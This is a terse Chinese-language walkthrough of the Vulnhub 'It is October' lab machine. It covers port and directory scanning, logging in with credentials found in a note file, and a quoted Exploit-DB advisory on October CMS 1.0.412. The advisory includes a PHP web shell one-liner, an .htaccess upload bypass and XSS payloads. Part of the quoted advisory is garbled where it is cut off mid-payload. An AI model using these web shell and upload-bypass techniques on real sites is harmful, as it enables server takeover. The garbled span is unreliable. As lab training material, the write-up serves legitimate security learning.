Vulnhub靶机 it is october
靶机IP 192.168.0.150
配置:NET
之前一直配置不上IP的
这有教程
ports=$(nmap -p- --min-rate=1000 -sT -T4 192.168.0.107 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports -sT 192.168.0.107
CMS:October
想用gobuster的
但是新版本没弄明白
指令不一样了
所以还是选择dirb扫描目录
gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100 -u http://192.168.0.150/
dirb http://192.168.0.150
找到后台
扫了一下
没什么有用的
nikto -h http://192.168.0.150
8080页面发现mtnote.txt
打开发现账号
登录进去
root@kali:~# cat /usr/share/exploitdb/exploits/php/webapps/41936.txt
October CMS v1.0.412 several vulnerabilities
############################################
Information
===========
Name: October CMS v1.0.412 (build 412)
Homepage: http://octobercms.com
Vulnerability: several issues, including PHP code execution
Prerequisites: attacker has to be authenticated user with media or asset
management permission
CVE: pending
Credit: Anti Räis
HTML version: https://bitflipper.eu
Product
=======
October is a free, open-source, self-hosted CMS platform based on the
Laravel
PHP Framework.
Description
===========
October CMS build 412 contains several vulnerabilities. Some of them
allow an
attacker to execute PHP code on the server. Following issues have been
identified:
1. PHP upload protection bypass
2. Apache .htaccess upload
3. stored WCI in image name
4. reflected WCI while displaying project ID
5. PHP code execution via asset management
6. delete file via PHP object injection
7. asset save path modification
Proof of Concepts
=================
1. PHP upload protection bypass
-------------------------------
Authenticated user with permission to upload and manage media contents can
upload various files on the server. Application prevents the user from
uploading PHP code by checking the file extension. It uses black-list based
approach, as seen in octobercms/vendor/october/rain/src/Filesystem/
Definitions.php:blockedExtensions().
==================== source start ========================
106 <?php
107 protected function blockedExtensions()
108 {
109 return [
110 // redacted
111 'php',
112 'php3',
113 'php4',
114 'phtml',
115 // redacted
116 ];
117 }
==================== source end ========================
We can easily bypass file upload restriction on those systems by using an
alternative extension, e.g if we upload sh.php5 on the server:
==================== source start ========================
<?php $_REQUEST['x']($_REQUEST['c']);
==================== source end ========================
Code can be execute by making a following request:
http://victim.site/storage/app/media/sh.php5?x=system&c=pwd
2. Apache .htaccess upload
--------------------------
As described in the PHP upload protection bypass section, the
application uses
black-list based defense. It does not prevent the attacker from uploading a
.htaccess files which makes it exploitable on Apache servers. Attacker
can use
it to add another handler for PHP files and upload code under an alternative
name. Attacker has to first upload the .htaccess configuration file with
following settings:
==================== source start ========================
AddHandler application/x-httpd-php .z
==================== source end ========================
This will execute all .z files as PHP and after uploading a code named
sh.z to
the server. It can be used to execute code as described previously.
3. stored WCI in image name
---------------------------
Authenticated user, with permission to customize back-end settings, can
store
WCI payload in the image name. The functionality is located at:
Settings -> Customize Back-end -> Brand Logo -> (upload logo) ->
(edit name) -> (add title)
Set the name to following value:
==================== source start ========================
">==================== source end ========================
Payload is executed when the victim clicks on the image name to edit it.
When the administrator edits user's profile image, attacker's payload is
executed, allowing him to execute JavaScript during administrator's active
session. This can be used, for example, to give another user a "super-user"
permission.
4. reflected WCI while displaying project ID
--------------------------------------------
Authenticated user with permission to manage software updates can "Attach
Project". When invalid value is provided, the error message doesn't properly
escape the given value, which allows an attacker to execute code. Since it
requires the victim to paste or write the payload in the input field,
then it
isn't easily exploitable.
==================== source start ========================
">$_REQUEST['x'])){echo system($_REQUEST['x']);}?>查一下漏洞
还是第一条实用
在后台写入脚本
访问页面
nc连接
python还得加上3.7
要不不能运行还
其实不做ssh连接也可以查看proof.txt
但是还是要把权限拿到手
完成